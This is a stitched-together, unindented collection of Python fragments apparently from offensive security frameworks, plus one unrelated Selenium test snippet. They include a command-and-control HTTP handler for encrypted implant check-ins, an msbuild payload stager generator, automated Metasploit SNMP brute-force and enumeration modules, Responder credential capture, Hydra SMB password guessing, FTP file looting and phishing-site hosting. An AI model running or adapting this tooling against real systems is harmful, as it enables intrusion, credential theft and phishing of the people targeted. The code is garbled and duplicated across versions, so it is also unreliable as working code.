"/fullhash/" + lmhash + ":" + ntlmhash)
self.fire("newNTLMHash")
return
def view_event(self, data):
log_path = Utils.get_arg_at(data, 1, 2)
if log_path == "":
UI.error("Missing arguments")
return
if log_path == "key":
UI.warn("Your encryption key is '%s'" %
self.config.get("encryption-key"))
return
if log_path == "password":
UI.warn("Your server password is '%s'" %
self.config.get("server-password"))
return
if not log_path in ("http", "event", "error"):
UI.error("Invalid path")
return
log_path += ".log"
rows = Utils.get_arg_at(data, 2, 2)
if rows == "":
rows = 10
else:
try:
rows = int(rows)
except:
rows = 10
log_path = Log.get_current_path(log_path)
data = []
if Utils.file_exists(log_path):
for line in open(log_path, "rb").readlines():
data.append(line)
data = list(reversed(data))
print("\nLast %d lines of log\n----------------------\n" % rows)
data = list(data)
for i in range(0, rows):
try:
print data[i]
except:
pass
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set VERSION 2c\n")
msf.execute("run\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
for part in parts:
callFire = True
# Add all relevant details
p = part.split()
comString = p[p.index("SUCCESSFUL:") + 1]
self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString,
"output": outfile.replace("/", "%2F")})
if callFire:
self.fire("snmpCred")
# clean up after ourselves
result = msf.cleanup()
return
def get_autocommands(self, guid):
profile = self.config.get("profile")
commands = profile.get("autocommands")
if isinstance(commands, list):
shell = self.db.get_prompt(guid).decode().split(" ")[1]
UI.success("Running auto commands on shell %s" % shell)
Log.log_event("Running auto commands on shell", shell)
for command in commands:
print("\t[+] %s" % command)
Log.log_shell(guid, "Sending", command)
self.db.append_shell_data(
guid, "[%s] AutoCommand Sending: \n%s\n\n" %
(Utils.timestamp(), command))
self.db.push_cmd(guid, command, Utils.guid(),
self.config.get("username"))
def process(self):
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
command = "responder -I eth0 -wrf"
# run for 15 minutes
# result = Utils.execWait(command, temp_file, timeout=900)
result = Utils.execWait(command, temp_file, timeout=60)
# TODO
# check to see if we got any creds
# if not, wait 5 minutes and run again for 15 minutes
# repeat upto 5 4 times
return
class YtSite(object):
def __init__(self, driver, logger, url):
self.driver = driver
self.logger = logger
self.url = url
self.utils = Utils(self.driver, self.logger)
def run(self):
# 测试网站模块
self.utils.get_item_and_click('//li[9]/a')
self.driver.implicitly_wait(3)
self.utils.get_item_and_click('//tr[1]//a[2]')
self.utils.insert_to_all_text()
self.utils.select_all_item(1)
self.utils.get_item_and_click('//button[1]')
def do_POST(self):
if self.path.split('/')[1] == 'api':
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
length = 0
if not self.headers.getheader('Content-Length') == None:
length = int(self.headers.getheader('Content-Length'))
data = self.rfile.read(length)
try:
data = json.loads(data)
data['Data'] = self.rc4.crypt(base64.b64decode(data['Data']))
except:
Log.log_error('Invalid base64 data received or bad decryption', self.path)
self.return_data()
return
guid = ''
try:
guid = Utils.validate_guid(data['ID'])
except:
Log.log_error('Invalid request no GUID', self.path)
self.return_data()
return
if not guid == None:
self.db.update_checkin(guid, str(self.client_address[0]))
parser = HTTPDParser(config)
output = parser.parse_cmd(guid, data['Data'],
data['UUID'])
if not output == None:
uuid = output[:36]
output = output[37:]
self.output = \
base64.b64encode(self.rc4.crypt(output))
self.output = json.dumps({'UUID': uuid, 'ID': guid, 'Data': self.output})
else:
self.output = json.dumps({'UUID': None, 'ID': guid,'Data': Utils.gen_str(random.randrange(10,1000))})
self.return_json()
return
else:
self.output = Utils.load_file('html/%s' % self.config.get('http-default-404'))
self.return_data()
def do_POST(self):
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
length = 0
if not self.headers.get("Content-Length") == None:
length = int(self.headers.get("Content-Length"))
data = self.rfile.read(length)
try:
data = json.loads(data)
data["Data"] = self.rc4.dcrypt(base64.b64decode(data["Data"]))
except Exception as e:
print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2]))
Log.log_error("Invalid base64 data received or bad decryption", self.path)
self.return_data()
return
guid = ""
try:
guid = Utils.validate_guid(data["ID"])
except Exception as e:
print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2]))
Log.log_error("Invalid request no GUID", self.path)
self.return_data()
return
if not guid == None:
self.db.update_checkin(guid, str(self.client_address[0]))
parser = HTTPDParser(config)
output = parser.parse_cmd(guid, data["Data"], data["UUID"])
if not output == None:
uuid = output[:36]
output = output[37:]
self.output = base64.b64encode(self.rc4.crypt(output)).decode()
self.output = json.dumps({"UUID": uuid, "ID": guid, "Data": self.output})
else:
self.output = json.dumps({"UUID": None, "ID": guid,"Data": Utils.gen_str(random.randrange(10,1000))})
self.return_json()
return
else:
self.output = Utils.load_file("html/%s" % self.config.get("http-default-404"))
self.return_data()
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# Get list of working community strings for this host
comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
for comString in comStrings:
myMsf.lock.acquire()
msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set COMMUNITY %s\n" % comString)
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
myMsf.lock.release()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# Don't need to parse out IP, we are running module one IP at a time
# Just find lines with - and pull out share name
parts = re.findall(".* - .*", result)
for part in parts:
sharename = (part.split('-')[0]).strip()
kb.add("share/smb/" + t + "/" + sharename)
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/x11/open_x11\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
myMsf.lock.release()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
parts = re.findall(".*Open X Server.*", result)
for part in parts:
callFire = True
self.addVuln(t, "openX11",
{"port": "6000", "message": str(part), "output": outfile.replace("/", "%2F")})
# Nothing to trigger?
if callFire:
self.fire("x11Access")
# clean up after ourselves
result = msf.cleanup()
return
def generate_msbuild(self, ps):
msbuild = Utils.load_powershell_script("../bin/stager.csproj", 999)
rc4_key = RC4.gen_rc4_key(32)
hex_rc4_key = RC4.format_rc4_key(rc4_key)
rc4 = RC4(rc4_key)
data = base64.b64encode(rc4.crypt(ps))
return msbuild.replace("[PAYLOAD]", data).replace("[KEY]", hex_rc4_key)
def searchTarget(self, target, port, username, password):
success = False
# start packet capture
# cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
# srcip="", dstip=target)
try:
if (Utils.port_open(target, 21)):
# attempt to connect to the remote host
with ftputil.FTPHost(target, username, password) as host:
success = True
# get list of files and loop over them
recursive = host.walk("/", topdown=True, onerror=None)
for root, dirs, files in recursive:
for name in files:
for pattern in self.filepatterns:
match_list = fnmatch.filter(files, pattern)
for fname in match_list:
fpath = host.path.join(root, fname)
if host.path.isfile(fpath):
host.download(
fpath, self.config["proofsDir"] +
ip + fpath.replace("/", "_"))
host.close()
except ftputil.error.PermanentError:
self.display.error("Could not connect to %s on port 21" % (target))
# outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(port) + "_" + target + "_" + Utils.getRandStr(10)
# Utils.writeFile(self.getPktCap(cap), outfile)
# kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
return success
def start(self):
self.loadSites()
if self.config["ip"] == "0.0.0.0":
self.config["ip"]=Utils.getIP()
#define phishing sites
for key in self.websites:
self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, "logs/" + self.websites[key]['logfile'], self.db, self.websites[key]['redirecturl']).getResource()
site_length = 0
for key in self.phishingsites:
if (len(key) > site_length):
site_length = len(key)
# if we are doing port based
print
for key in self.phishingsites:
for port in range(self.MINPORT, self.MAXPORT):
try:
site = Site(self.phishingsites[key], logPath=self.logpath + "logs/" + self.websites[key]['logfile']+".access")
# site.logRequest = True
reactor.listenTCP(port, site)
print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), self.config["ip"], port)
self.websites[key]['port'] = port
break
except twisted.internet.error.CannotListenError, ex:
continue
def loadSites(self):
templates = self.getTemplates()
print
# loop over each web template
for f in templates:
template_file = f + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
print "Found the following web sites: [%s]" % template_file
# read in the VHOST, LOGFILE, and REDIRECTURL
VHOST = ""
LOGFILE = ""
REDIRECTURL = ""
#PATH = self.config["web_template_path"] + f + "/"
PATH = f + "/"
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("VHOST=", line)
if match:
VHOST=line.replace('"', "")
VHOST=VHOST.split("=")
VHOST=VHOST[1].lower().strip()
match2=re.search("LOGFILE=", line)
if match2:
LOGFILE=line.replace('"', "")
LOGFILE=LOGFILE.split("=")
LOGFILE=LOGFILE[1].strip()
match3=re.search("REDIRECTURL=", line)
if match3:
REDIRECTURL=line.replace('"', "")
REDIRECTURL=REDIRECTURL.replace(r'\n', "\n")
REDIRECTURL=REDIRECTURL.split("=")
REDIRECTURL=REDIRECTURL[1].strip()
self.websites[VHOST] = {'path':PATH, 'port':8000, 'logfile':LOGFILE, 'redirecturl':REDIRECTURL}
def flushdb(self, data):
force = Utils.get_arg_at(data, 1, 1)
if force:
self.db.flushdb()
UI.error("The whole redis DB was flushed")
else:
UI.error("Please use the force switch")
def loadSites(self):
templates = self.getTemplates()
print
# loop over each web template
for f in templates:
template_file = f + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
print "Found the following web sites: [%s]" % template_file
# read in the VHOST, LOGFILE, and REDIRECTURL
VHOST = ""
LOGFILE = ""
REDIRECTURL = ""
#PATH = self.config["web_template_path"] + f + "/"
PATH = f + "/"
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("VHOST=", line)
if match:
VHOST=line.replace('"', "")
VHOST=VHOST.split("=")
VHOST=VHOST[1].lower().strip()
match2=re.search("LOGFILE=", line)
if match2:
LOGFILE=line.replace('"', "")
LOGFILE=LOGFILE.split("=")
LOGFILE=LOGFILE[1].strip()
match3=re.search("REDIRECTURL=", line)
if match3:
REDIRECTURL=line.replace('"', "")
REDIRECTURL=REDIRECTURL.replace(r'\n', "\n")
REDIRECTURL=REDIRECTURL.split("=")
REDIRECTURL=REDIRECTURL[1].strip()
self.websites[VHOST] = {'path':PATH, 'port':8000, 'logfile':LOGFILE, 'redirecturl':REDIRECTURL}
def start(self):
self.loadSites()
if self.config["ip"] == "0.0.0.0":
self.config["ip"] = Utils.getIP()
#define phishing sites
for key in self.websites:
self.phishingsites[key] = PhishingSite(
self.config, key, self.websites[key]['path'], self.logpath,
"logs/" + self.websites[key]['logfile'], self.db,
self.websites[key]['redirecturl']).getResource()
site_length = 0
for key in self.phishingsites:
if (len(key) > site_length):
site_length = len(key)
# if we are doing port based
print
for key in self.phishingsites:
for port in range(self.MINPORT, self.MAXPORT):
try:
site = Site(self.phishingsites[key],
logPath=self.logpath + "logs/" +
self.websites[key]['logfile'] + ".access")
# site.logRequest = True
reactor.listenTCP(port, site)
print "Started website [%s] on [http://%s:%s]" % (
('{:<%i}' %
(site_length)).format(key), self.config["ip"], port)
self.websites[key]['port'] = port
break
except twisted.internet.error.CannotListenError, ex:
continue
def start(self):
self.loadSites()
ip = Utils.getIP()
#define phishing sites
for key in self.websites:
self.phishingsites[key] = PhishingSite(self.config, key, self.websites[key]['path'], self.logpath, self.websites[key]['logfile'], self.websites[key]['redirecturl']).getResource()
site_length = 0
for key in self.phishingsites:
if (len(key) > site_length):
site_length = len(key)
# if we are doing port based
print
for key in self.phishingsites:
for port in range(self.MINPORT, self.MAXPORT):
try:
reactor.listenTCP(port, Site(self.phishingsites[key]))
print "Started website [%s] on [http://%s:%s]" % (('{:<%i}' % (site_length)).format(key), ip, port)
self.websites[key]['port'] = port
break
except twisted.internet.error.CannotListenError, ex:
continue
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = self.getUsers(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
# make outfile
temp_file = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
command = self.config["hydra"] + " -s 445 -l " + user + " -P " + self.config[
"miscDir"] + "passwords.txt smb://" + t
result = Utils.execWait(command, temp_file, timeout=30)
# Extract usernames & passwords from results and add to KB
parts = re.findall(".* login:\s\s*([^\s]*)\s\s*password:\s\s*([^\s]*)", result)
for part in parts:
self.fire("newSmbPassword")
self.addVuln(t, "guessable password", {"output": temp_file.replace("/", "%2F")})
self.display.debug(
"Identified username [" + part[0] + "] with password [" + part[1] + "] on " + t)
kb.add("creds/host/" + t + "/username/" + part[0].strip() + "/password/" + part[1].strip())
return
def process(self):
# load any targets we are interested in
self.getTargets()
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
self.display.verbose(self.shortName + " - Connecting to " + t)
# add the new IP to the already seen list
self.addseentarget(t)
# make outfile
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
# run rpcclient
command = "ldapsearch -h " + t + " -p 389 -x -s base"
result = Utils.execWait(command, outfile)
# TODO - Parse output and do stuff
parts = re.findall("ref: .*", result)
for part in parts:
callFire = True
self.addVuln(t, "AnonymousLDAP", {"port": "389", "message": str(part).replace("/", "%2F"), "output": outfile.replace("/", "%2F")})
if callFire:
self.fire("anonymousLDAP")
return